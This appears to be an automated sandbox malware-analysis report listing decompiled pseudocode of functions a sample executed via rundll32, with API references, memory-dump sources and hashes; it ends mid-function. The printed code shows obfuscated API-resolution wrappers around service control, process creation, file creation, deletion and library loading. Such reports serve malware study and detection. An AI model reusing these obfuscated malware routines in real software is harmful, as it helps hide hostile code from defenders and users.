			E00325FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E003307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00325fb5
0x00325fb6
0x00325fb7
0x00325fbb
0x00325fbc
0x00325fc1
0x00325fcb
0x00325fd7
0x00325fde
0x00325fe5
0x00325ffc
0x00325fff
0x00326006
0x0032600d
0x0032601a
0x00326025
0x0032602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00326025

Memory Dump Source

Source File: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2112537009.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2112583999.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: ddd5ee7d26a6c35e067694803469147d3d30a8eb73169ce07aae0d4b448bfe28
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: D7F044B0C11208FFDB08DFA0E94789EBF78EB40300F108198E40967260D7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2868 Parent PID: 2788 rundll32.exeCOMMON

Executed Functions

Function 001D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001d295f
0x001d2964
0x001d2967
0x001d296a
0x001d296d
0x001d296e
0x001d296f
0x001d2977
0x001d2985
0x001d298a
0x001d2992
0x001d299a
0x001d29a2
0x001d29a9
0x001d29b0
0x001d29b7
0x001d29bb
0x001d29cf
0x001d29dc
0x001d29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC

Strings

<^, xrefs: 001D2977

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001dc6e1
0x001dc6e6
0x001dc6f0
0x001dc6fc
0x001dc703
0x001dc706
0x001dc70d
0x001dc711
0x001dc715
0x001dc71c
0x001dc723
0x001dc72a
0x001dc731
0x001dc738
0x001dc751
0x001dc762
0x001dc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762

Strings

/O, xrefs: 001DC6E6

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001d1006
0x001d1009
0x001d100c
0x001d1011
0x001d1016
0x001d101d
0x001d1026
0x001d102d
0x001d1034
0x001d103b
0x001d1047
0x001d104f
0x001d1057
0x001d105e
0x001d1065
0x001d106c
0x001d1073
0x001d1077
0x001d108b
0x001d1096
0x001d109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096

Strings

[, xrefs: 001D103B

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001d485e
0x001d487a
0x001d487d
0x001d4884
0x001d488b
0x001d4892
0x001d489d
0x001d48a0
0x001d48ad
0x001d48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001D48B7

Strings

[, xrefs: 001D488B

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001e4f80
0x001e4f81
0x001e4f82
0x001e4f86
0x001e4f87
0x001e4f8c
0x001e4fa5
0x001e4fa8
0x001e4faf
0x001e4fb6
0x001e4fc7
0x001e4fca
0x001e4fd7
0x001e4fe2
0x001e4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2

Strings

{#lm, xrefs: 001E4FC2

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001E976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x001e9772
0x001e9773
0x001e9778
0x001e977a
0x001e977b
0x001e977e
0x001e977f
0x001e9782
0x001e9785
0x001e9788
0x001e9789
0x001e978c
0x001e978f
0x001e9790
0x001e9791
0x001e9794
0x001e9797
0x001e979a
0x001e979d
0x001e97a0
0x001e97a3
0x001e97a6
0x001e97a7
0x001e97a8
0x001e97ad
0x001e97b7
0x001e97c3
0x001e97ca
0x001e97d1
0x001e97d8
0x001e97df
0x001e97e3
0x001e97fc
0x001e9816
0x001e981d

APIs

CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001DB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001db569
0x001db56a
0x001db56d
0x001db572
0x001db574
0x001db577
0x001db57a
0x001db57d
0x001db580
0x001db583
0x001db586
0x001db587
0x001db58a
0x001db58d
0x001db590
0x001db593
0x001db594
0x001db595
0x001db59a
0x001db5a4
0x001db5b8
0x001db5c0
0x001db5c4
0x001db5cb
0x001db5d2
0x001db5d9
0x001db5e6
0x001db5fd
0x001db604

APIs

CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x001e9821
0x001e9822
0x001e9825
0x001e9828
0x001e982a
0x001e982c
0x001e982f
0x001e9832
0x001e9835
0x001e9836
0x001e9837
0x001e983c
0x001e9855
0x001e9858
0x001e985f
0x001e9866
0x001e986d
0x001e9874
0x001e987b
0x001e988e
0x001e989b
0x001e98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x001e7bf7
0x001e7bf8
0x001e7bfa
0x001e7bfd
0x001e7bff
0x001e7c02
0x001e7c06
0x001e7c07
0x001e7c0f
0x001e7c1d
0x001e7c25
0x001e7c2d
0x001e7c31
0x001e7c38
0x001e7c3f
0x001e7c46
0x001e7c4a
0x001e7c5e
0x001e7c67
0x001e7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001DF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001df662
0x001df663
0x001df665
0x001df668
0x001df66a
0x001df66d
0x001df670
0x001df673
0x001df677
0x001df678
0x001df67d
0x001df687
0x001df693
0x001df69a
0x001df6a1
0x001df6a5
0x001df6a9
0x001df6b0
0x001df6c9
0x001df6d8
0x001df6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001DB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001D602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001db6f3
0x001db6f8
0x001db702
0x001db70b
0x001db712
0x001db719
0x001db720
0x001db727
0x001db72e
0x001db747
0x001db759
0x001db75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 001EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001eaa3f
0x001eaa40
0x001eaa41
0x001eaa44
0x001eaa47
0x001eaa4b
0x001eaa4c
0x001eaa51
0x001eaa5b
0x001eaa64
0x001eaa68
0x001eaa6f
0x001eaa76
0x001eaa8d
0x001eaa90
0x001eaa9d
0x001eaaa8
0x001eaaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
